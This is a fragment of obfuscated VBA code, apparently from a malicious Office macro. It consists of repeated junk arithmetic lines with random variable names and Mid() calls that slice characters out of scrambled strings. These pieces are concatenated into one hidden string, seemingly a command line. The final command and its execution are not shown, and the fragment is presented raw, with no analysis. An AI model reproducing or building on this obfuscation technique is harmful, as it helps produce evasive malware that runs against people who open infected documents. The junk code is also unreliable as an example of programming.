YOHiDfqIzZR = 871 / Rnd(4) + VlpjvaBQc + IPBdzTwpD * 9 + Int(ztAIkBSapFTLOJ * CStr(opzOGiYDYHGjU)) + zsEKVRclj * CDate(3624 - 352183467 * 84 / 475) / tHbbWuzBskIdwb - CSng(620)
ukEzfCKnF = Mid("icE %MtmTmmdzhkaNHAbdjzNdCqpbP", 4, 2)
cWwjK = 871 / Rnd(4) + tqnKWzNzqQzA + VQjMcNnwAvHSpu * 9 + Int(RzpLsQOH * CStr(TmwdakzHTXP)) + IpBjpktufr * CDate(3624 - 352183467 * 84 / 475) / DFjrboHfHIFs - CSng(620)
fIKTXZ = 871 / Rnd(4) + kpXEXKiJH + VSwjcAtnGUwDp * 9 + Int(wRUMzfj * CStr(fofuuhDMuXhjBD)) + jwLfflwT * CDate(3624 - 352183467 * 84 / 475) / zWFFqVLbMamH - CSng(620)
KJHkRliYJVT = 871 / Rnd(4) + OKVPwAzRflIJn + DjVMwcFvYus * 9 + Int(TLsHODwMSi * CStr(dwfrPYUXh)) + JEzmwGQjSlbXc * CDate(3624 - 352183467 * 84 / 475) / oZXWFNbMYSrQ - CSng(620)
lofLcJwHbA = Mid("u^uGrNCTPkRYTCjZjwOlJYkGJzhdORjELk", 2, 1)
DYBGQ = 871 / Rnd(4) + iFLjuZb + JwuHoOlABJ * 9 + Int(UzuXbzWYLFUb * CStr(BfQGTwrWs)) + qYLzBHZb * CDate(3624 - 352183467 * 84 / 475) / QDnBohkl - CSng(620)
ODisjpcSi = 871 / Rnd(4) + HriCMWDQrpP + OlAFUoPANn * 9 + Int(wLwwMRijkdcb * CStr(FdAunOiRhVkF)) + qhKUHNTEkrNYrz * CDate(3624 - 352183467 * 84 / 475) / GfvmJOAr - CSng(620)
wnPEYGobz = 871 / Rnd(4) + APRpXiGIzf + FSNcoDzQzURl * 9 + Int(IKNOdbYjKSV * CStr(sBAjrsJuvFw)) + KMkiTlEjdnjMR * CDate(3624 - 352183467 * 84 / 475) / fVHzuzrwvCwjH - CSng(620)
jtvckThzwRr = Mid("CXomhDSrYCpzzslGaK  pXuAHcS", 19, 2)
KUsGHp = 871 / Rnd(4) + UNzJVQpNsNaBY + WOIjUlmVv * 9 + Int(WKBawvkqp * CStr(zuOKjTBzfi)) + HhPYXBhfFA * CDate(3624 - 352183467 * 84 / 475) / RknKPPOwdkLCQb - CSng(620)
OsOUIwUV = 871 / Rnd(4) + qRfNIrd + wsbYzjZPSziw * 9 + Int(cNiYLCi * CStr(EjqJiLJuOXZVmc)) + VZEZqlAwEGD * CDate(3624 - 352183467 * 84 / 475) / EwpwoupuJ - CSng(620)
IGaVn = 871 / Rnd(4) + zwAknpR + OdlBbuCKjVAdi * 9 + Int(ZEmkjAovfz * CStr(WDkiVNJzuYjdNn)) + bZcjQwV * CDate(3624 - 352183467 * 84 / 475) / XwzCGQATzmE - CSng(620)
fGlLACDD = Mid("nmXkFNSwGFDpZwzwRlUkH", 8, 1)
vNlcbiWXJV = 871 / Rnd(4) + POVQVEbIdOAh + zGcrIDkmD * 9 + Int(wFzZbkawhVk * CStr(qEaQwWvc)) + MWiqpLChqYzLj * CDate(3624 - 352183467 * 84 / 475) / KYizYCSSMd - CSng(620)
jJtibjMczz = 871 / Rnd(4) + jMMzoiWIXvUS + PJOzkouUmlasCB * 9 + Int(AOtcTcJiz * CStr(MSThwFwZdsYwn)) + mNSubmE * CDate(3624 - 352183467 * 84 / 475) / jIIJBswSFfRF - CSng(620)
OmLWEPNsKq = 871 / Rnd(4) + QYRsGNrapljOj + YXPrzmwGiPsR * 9 + Int(XaWtKFAYnl * CStr(jKGltkbJvOzfC)) + OqrKpBApqUA * CDate(3624 - 352183467 * 84 / 475) / sZIiNllaH - CSng(620)
SzFdutslHr = Mid("NXYbInIEEqmidofKzdiWXwwTqhFTX", 12, 3)
tdShofi = 871 / Rnd(4) + WbmpfbSYIp + bsqGKPC * 9 + Int(nalKZmDG * CStr(KnshhdPlfEv)) + lNYTGiJB * CDate(3624 - 352183467 * 84 / 475) / IpcFRzlRMCcUr - CSng(620)
jzvZcw = 871 / Rnd(4) + KnLHNJTh + wdMYTtWAv * 9 + Int(tZDkZmo * CStr(qtMMfWRTiuI)) + OHLjjmvmDm * CDate(3624 - 352183467 * 84 / 475) / bmqGmGDlVY - CSng(620)
QdwjRFX = 871 / Rnd(4) + VwUtOaUiL + ABNMqTEt * 9 + Int(jCzPbQj * CStr(USBTpuzDXlp)) + bWdiVFPkYatwiQ * CDate(3624 - 352183467 * 84 / 475) / LXjsciwA - CSng(620)
tFrNnrwBlDP = Mid("bmDjZjKSGdzvkaDLwKqYCi", 10, 1)
VJvrCk = 871 / Rnd(4) + coCmwqHzLcs + rmOTAnqCbE * 9 + Int(kZoPfMiImw * CStr(iWjznFiEasjN)) + TXnCwfWDYQRMJa * CDate(3624 - 352183467 * 84 / 475) / mjUGaHIsmDz - CSng(620)
NsvvoV = 871 / Rnd(4) + iKNdAKUzjL + jEpOioP * 9 + Int(scfiniaL * CStr(scTtqmZzlVa)) + SYkJFlAtrtjjb * CDate(3624 - 352183467 * 84 / 475) / zwjZzazoHGrH - CSng(620)
WKJuLFN = 871 / Rnd(4) + XXdiBLqwIZcK + cjFFPkif * 9 + Int(RtYdnqL * CStr(AwztwfvlQBT)) + TMEJwwbCmXT * CDate(3624 - 352183467 * 84 / 475) / GUFjGYYzkd - CSng(620)
MELOsjPkt = Mid("zh   HsUwPPnRjwGPVmZrAWfooftFzVhJFG", 3, 3)
ojlLCNdUHdI = 871 / Rnd(4) + RPPtTpRaEvVis + RowtjSFpaS * 9 + Int(VzsdRdSz * CStr(iibAQuJKsDLqG)) + hAIMHon * CDate(3624 - 352183467 * 84 / 475) / pzhzqZwnRDk - CSng(620)
YPocoOKUlkj = 871 / Rnd(4) + aWoHjMVua + PiJavGjYhFKo * 9 + Int(qwYEzihTBziJ * CStr(sWbYEmQwjlA)) + ViRIKZCl * CDate(3624 - 352183467 * 84 / 475) / wLLHXQtSOhaRT - CSng(620)
DfFYSAK = 871 / Rnd(4) + qnMzdpJ + wXHVPwKdIQKJEG * 9 + Int(iTSEjNFmIFFKt * CStr(KjSfrfSpLisOT)) + AsbwkwhiKkZ * CDate(3624 - 352183467 * 84 / 475) / qkwPJnRpzhri - CSng(620)
NsKwJOc = Mid("varpfDtAwdCswjGYRcarZwljpJSJzEYtNcwsnF", 24, 2)
OIFDj = 871 / Rnd(4) + JzIAXYiHK + sbvQLqYjXl * 9 + Int(LPRhWXjUEZuCUH * CStr(BZfNHqAn)) + wUdHXJuth * CDate(3624 - 352183467 * 84 / 475) / wirSBBBmGz - CSng(620)
ClYDzOU = 871 / Rnd(4) + mmOHZTOlm + SlWWUYiEd * 9 + Int(iXTSSWhCR * CStr(kdPWTCTsiJ)) + afjmpbCLTsu * CDate(3624 - 352183467 * 84 / 475) / miPTvpClMTQhoV - CSng(620)
BzXBFGEbDj = 871 / Rnd(4) + ZbIApwAKiEKcCl + uZzvfAU * 9 + Int(JcJGiLF * CStr(tpQXtUG)) + KtjCPnGohzHc * CDate(3624 - 352183467 * 84 / 475) / LSzEawYjsWwZA - CSng(620)
QkDbiO = Mid("iqBHUjwU  /hSNIYjKLAQzbCXWl", 9, 3)
WOJhIwK = 871 / Rnd(4) + CSFmWTnHrmjcui + zdphcoEjXCfXN * 9 + Int(PzzTbAtO * CStr(YczaXjOM)) + GWWmrGtL * CDate(3624 - 352183467 * 84 / 475) / ihjrwZBbnjISiz - CSng(620)
oAzciV = 871 / Rnd(4) + pLRkiHdNzsIz + nVmzmjQq * 9 + Int(MKhVuHmsPSl * CStr(CXlsHvVVaKfnwq)) + vofOwqOwG * CDate(3624 - 352183467 * 84 / 475) / JMWaHdp - CSng(620)
DTJwOlqfp = 871 / Rnd(4) + WRFdNjCJpWQr + dHqaPBKjXhfa * 9 + Int(vsfDpcZmPa * CStr(PwRfYtU)) + hQwjsiCcmDz * CDate(3624 - 352183467 * 84 / 475) / aDokKdmhoSzN - CSng(620)
SODvmWdRzZ = Mid("fKWwoGjbVdiYN", 10, 1)
wibbFN = 871 / Rnd(4) + NkwAGfnu + ABftWDqrDj * 9 + Int(oInYipz * CStr(zvThpblGRuhA)) + BVOzbImIfjD * CDate(3624 - 352183467 * 84 / 475) / lWEzaVQhEvajTp - CSng(620)
iKWZCrF = 871 / Rnd(4) + PHjsrwR + JPNZhdwVQksFh * 9 + Int(sijQzzdzVZMdvA * CStr(YhABtMN)) + okCpsnEoT * CDate(3624 - 352183467 * 84 / 475) / ROCLaARNMu - CSng(620)
VmUiNckJfM = 871 / Rnd(4) + lzYzVidnn + bDhLaTLPoD * 9 + Int(hIrYRTW * CStr(vhdlqBK)) + liKHjQY * CDate(3624 - 352183467 * 84 / 475) / SjVdbORflNEphZ - CSng(620)
CPTfzZ = Mid("qrvYvnzqrVioujnEFuauAVzjOAvpprsIP", 11, 3)
zZTohrzJw = 871 / Rnd(4) + NDivSsDsEoliQ + jvJlJRksGdmAM * 9 + Int(zjfzTZbh * CStr(uZvBwPijjl)) + uFIcCcDUw * CDate(3624 - 352183467 * 84 / 475) / JSfwsVI - CSng(620)
wsERQ = 871 / Rnd(4) + TrROhmIdHQM + iCdUEzUG * 9 + Int(ZsjTPLp * CStr(dHaEckv)) + jMSfqOtBD * CDate(3624 - 352183467 * 84 / 475) / CVpjjdwZuwkvSb - CSng(620)
BBWHGbQDd = 871 / Rnd(4) + LrQzbPLOPodY + COtMtaDzqVHkPl * 9 + Int(PEDuauYu * CStr(vitQoNO)) + YHGEmkwuFoUVJ * CDate(3624 - 352183467 * 84 / 475) / LdFwKljwC - CSng(620)
TQCAmlwnXT = Mid("jdVNzUlJFVrVcXpwGOdUN", 13, 1)
zatQAB = 871 / Rnd(4) + bdImDCShB + nBaOLzfPQI * 9 + Int(MzYwHCpwio * CStr(rNOkkPzwknnLvb)) + LjzEjCSwOj * CDate(3624 - 352183467 * 84 / 475) / pwzdlTjtKMza - CSng(620)
EtZnRSpZtN = 871 / Rnd(4) + fwMoqIdwKJs + spjPfFz * 9 + Int(LMnWwFMcmmn * CStr(PjbaaAitIzpL)) + lThiPYAabP * CDate(3624 - 352183467 * 84 / 475) / JpqlwBLXV - CSng(620)
RfuMwcV = 871 / Rnd(4) + QPTYhYlcV + rFzdHrYPAEAZ * 9 + Int(zGCUiCQ * CStr(LJkoQiuR)) + uIUKHXnpZCmzz * CDate(3624 - 352183467 * 84 / 475) / NqLWRiDGaE - CSng(620)
CmaDY = Mid("UjaJEqspRnrBNz   wYbztiB", 15, 3)
RGATmqn = 871 / Rnd(4) + pJNJofXG + MXbBMmiuWO * 9 + Int(IoTIRkJwwHnRq * CStr(wJTZbsdT)) + DwhoizR * CDate(3624 - 352183467 * 84 / 475) / oJiCBpFr - CSng(620)
mHQkkPV = 871 / Rnd(4) + YwGdqkWmzPaYP + TivctVZP * 9 + Int(ZjfGsSStOJz * CStr(qSkcpWVKbC)) + zSivksP * CDate(3624 - 352183467 * 84 / 475) / PJSjzLiiTiW - CSng(620)
PHQDACtv = 871 / Rnd(4) + VaJNYFl + QcLVvVJoiPMjw * 9 + Int(zfAzHHJvTOh * CStr(XCKsfqwwOW)) + lsoZNSa * CDate(3624 - 352183467 * 84 / 475) / IHrciNZwdjUIz - CSng(620)
cRCftSAi = Mid("wVDRHjXBaz   YKHGcDzRuKPojlqfFjvlN", 11, 3)
sNRZnvDD = 871 / Rnd(4) + PSmcQLAE + DFEXbhnNXiBwhh * 9 + Int(YlnRKsBf * CStr(ppffBfZ)) + KcLDNIVdrQwwU * CDate(3624 - 352183467 * 84 / 475) / hkbEiXitG - CSng(620)
XZzQZKBrmBdS = TQCAmlwnXT + NBULafz + OiXMAupFENH + CPTfzZ + BGbQrAwCT + TiwAvoWqEi + rLqinHhs + SzFdutslHr + KnGduF + uqFcRb + fIEBwOi + KbdocJbk + HEXNMSGYG + SODvmWdRzZ + zKqRvbjURc + czbKPG + hoftzdwLmw + whCBXwI + NESwohj + BZmXKOUOTOB + NsKwJOc + tFrNnrwBlDP + fGlLACDD + vbLSfuR + wflkKc + pGBicwtzc + MELOsjPkt + ukEzfCKnF + CYPtKwjKF + lofLcJwHbA + dSIRbSEwJzY + whKBPtNH + wzPWH + TcfDji + jtvckThzwRr + WdLuUvL + jslNAh + QkDbiO + BvmvH + mZJwbirMFkf + lPzaIXrJ + wYPHIz + CmaDY + MsUmLYzR + YtpDjHkGSnj + MQwqBQsoH + AOdiOUG + cRCftSAi
BZzilBHLr = 871 / Rnd(4) + JnFWHKcR + TbEjkbIvEzBBJ * 9 + Int(WJiOakcjF * CStr(mLacNUt)) + GvaiwpP * CDate(3624 - 352183467 * 84 / 475) / cFDOqHzW - CSng(620)
iMcwBjKkW = 871 / Rnd(4) + wYBjijDzuNrsNo + THXjrOfMDtBrzA * 9 + Int(kpHwtqFwXT * CStr(rNlfqzoz)) + YnEflRMzmjrF * CDate(3624 - 352183467 * 84 / 475) / UcBkQvIOLAMjWR - CSng(620)
aYCCDASBz = 871 / Rnd(4) + bLbiHKqbEssJ + FitpTNnrzOz * 9 + Int(ZjdoFjTfPIET * CStr(HBJkbiZQuzT)) + KznKucwb * CDate(3624 - 352183467 * 84 / 475) / iaMnwLYdOwdZL - CSng(620)
LMiHXkZVf = 871 / Rnd(4) + KdvhjUVjIrlZ + wwcSBnfAplw * 9 + Int(bjnFMBWDnCKDi * CStr(ItQVhamlhKuSY)) + zmUswuEohavq * CDate(3624 - 352183467 * 84 / 475) / WntmYnJim - CSng(620)
jUEYAqwcK = 871 / Rnd(4) + doDBiRHknULpZr + QwoXViOD * 9 + Int(CAoYuOqFQ * CStr(MZSlKUR)) + WKauuML * CDate(3624 - 352183467 * 84 / 475) / sKEoPOkqzidj - CSng(620)
qYiGZYimw = 871 / Rnd(4) + dDEastmI + bMKWfAb * 9 + Int(zobmcqiNzfUU * CStr(iYkfjBkoWq)) + qcCWfCw * CDate(3624 - 352183467 * 84 / 475) / zmhzXaB - CSng(620)
MWNvNSnkt = 871 / Rnd(4) + ZqzwrzbwWvzoL + uhOXjBbNFipO * 9 + Int(bcmDrIiFMwH * CStr(pFzAfBX)) + fAjDQBsM * CDate(3624 - 352183467 * 84 / 475) / lUJdVAVk - CSng(620)
End Function
